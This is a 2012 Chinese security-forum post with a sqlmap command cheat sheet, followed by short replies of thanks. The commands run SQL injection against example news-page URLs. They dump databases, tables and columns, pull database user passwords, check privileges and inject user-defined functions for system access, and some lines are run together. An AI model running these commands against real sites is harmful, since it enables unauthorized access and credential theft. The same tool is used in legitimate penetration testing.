社区首页 › 技术文章 › Sqlmap最新测试文档

90_ 发表于 2012-8-3 10:08:52

Sqlmap最新测试文档

sqlmap -h
官方最新文档:http://sqlmap.sourceforge.net/doc/README.html
sqlmap -u "http://www.ihonker.org /news?id=1"
--current-user # 获取当前用户名称

sqlmap -u "http://www.xxoo.com/news?id=1"
--current-db# 获取当前数据库名称

sqlmap -u "http://www.xxoo.com/news?id=1"
--tables-D "db_name" #列表名

sqlmap -u "http://www.ihonker.org /news?id=1"
--columns -T "tablename" users-D "db_name" - v 0 #列字段

sqlmap -u "http://www.ihonker.org /news?id=1"
--dump
- C "column_name"-T "table_name" - D

"db_name" -v 0# 获取字段内容

****************** 信息获取 ****************** sqlmap -u "http://www.ihonker.org /news?id=1"--smart--level 3 --users# smart 智能 level执行测试等级
Sqlmap 最新测试文档 Email:linuxseclab@gmiall.com sqlmap -u "http://www.ihonker.org /news?id=1"--dbms "Mysql" --users# dbms 指定数据库类型sqlmap -u "http://www.ihonker.org /news?id=1"    --users# 列数据库用户sqlmap -u "http://www.ihonker.org /news?id=1"    --dbs# 列数据库sqlmap -u "http://www.ihonker.org /news?id=1"   --passwords # 数据库用户密码sqlmap -u "http://www.ihonker.org /news?id=1"   --passwords-U root -v 0 # 列出指定用户数据库密码sqlmap -u "http://www.ihonker.org /news?id=1"    --dump -C "password,user,id" -T "tablename" - D "db_name" - - start 1 --stop 20#列出指定字段，列出 20 条sqlmap -u "http://www.ihonker.org /news?id=1"    --dump-all -v 0 #列出所有数据库所有表sqlmap -u "http://www.ihonker.org /news?id=1"   --privileges # 查看权限sqlmap -u "http://www.ihonker.org /news?id=1"   --privileges -U root # 查看指定用户权限sqlmap -u "http://www.ihonker.org /news?id=1"    --is-dba - v 1 #是否是数据库管理员sqlmap -u "http://www.ihonker.org /news?id=1"    --roles # 枚举数据库用户角色sqlmap -u "http://www.ihonker.org /news?id=1"   --udf-inject # 导入用户自定义函数（获取系统权限！）sqlmap -u "http://www.ihonker.org /news?id=1"   --dump-all --exclude-sysdbs -v 0 # 列出当前库所有表sqlmap -u "http://www.ihonker.org /news?id=1"   --union-cols #union 查询表记录sqlmap -u "http://www.ihonker.org /news?id=1"   --cookie "COOKIE_VALUE" #cookie 注入sqlmap -u "http://www.ihonker.org /news?id=1"   -b # 获取 banner 信息sqlmap -u "http://www.ihonker.org /news?id=1" --data "id=3"#post 注入sqlmap -u "http://www.ihonker.org /news?id=1"-v 1 -f # 指纹判别数据库类型sqlmap -u "http://www.ihonker.org /news?id=1"--proxy"http://127.0.0.1:8118" # 代理注入sqlmap -u "http://www.ihonker.org /news?id=1"--string"STRING_ON_TRUE_PAGE"# 指定关键词**** Hidden Message *****

Tunixer 发表于 2012-8-3 10:27:31

这个很有用处。。。感谢提供sqlmap是个好工具

hack_qzob 发表于 2012-8-3 17:04:23

为什么我装的BT5没有sqlmap啊

lantian 发表于 2012-8-31 13:22:53

:lol 哈哈 bt5

youko 发表于 2013-1-19 14:20:25

谢谢最近研究这个

xiaolynn 发表于 2013-2-19 13:54:52

这个不错，，，

雨中的月 发表于 2013-3-14 16:01:41

谢谢分享！！！！！！！！！！

Mody 发表于 2013-3-17 11:11:22

看看隐藏的u我想要的

xsxq123 发表于 2013-3-18 22:56:30

不是在后面家命令吗

sickles 发表于 2013-3-19 15:10:08

工具需要认真研究灵活运用，学习ing

查看完整版本: Sqlmap最新测试文档